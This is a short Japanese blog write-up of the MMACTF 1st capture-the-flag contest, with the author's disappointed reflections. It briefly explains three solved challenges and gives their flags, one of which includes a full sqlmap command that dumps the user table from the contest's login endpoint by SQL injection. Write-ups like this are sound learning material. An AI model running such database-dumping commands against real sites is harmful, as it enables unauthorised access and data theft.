
ブログの名前なんて適当で良いのでは

説明を求めるな、記事を読め

MMACTF1stのwriteupと感想(辛い)

9/5~9/7にかけて行われたMMACTF1stに@socket_xさんとCTF_for_Primersというチームを組んで出場した。まず、自分が解けた問題が少なすぎたのでとても辛いCTFとなったというのが感想だった。以下解けた問題のwriteupです。

Pattern Lock

  • flag1

ggった

Smart Cipher System

  • flag2 入力した文字が1対1で暗号文に変化しているので適当にスクリプトを書き実行したらflagが得られた。

gistd4e6845aafcaf53d3bb3

MMA{f52da776412888170f282a9105d2240061c45dad}

Login as admin!

sqlmapというソフトを使って、$python sqlmap.py -u "http://arrive.chal.mmactf.link/login.cgi" --data "username=test&password=test" --tables -T user --dumpのように実行したところでた。

MMA{cats_alice_band}

このほかにもMQAAAAやSigner and Verifier、Uploader、splittedなどを解こうと努力したが結局フラグを出すことができなかった。チームでしっかり挑んだという経験が初だったがゆえに余計にもっと解かなければいけないし、ときたかったという悔しい気持ちが募るCTFになった。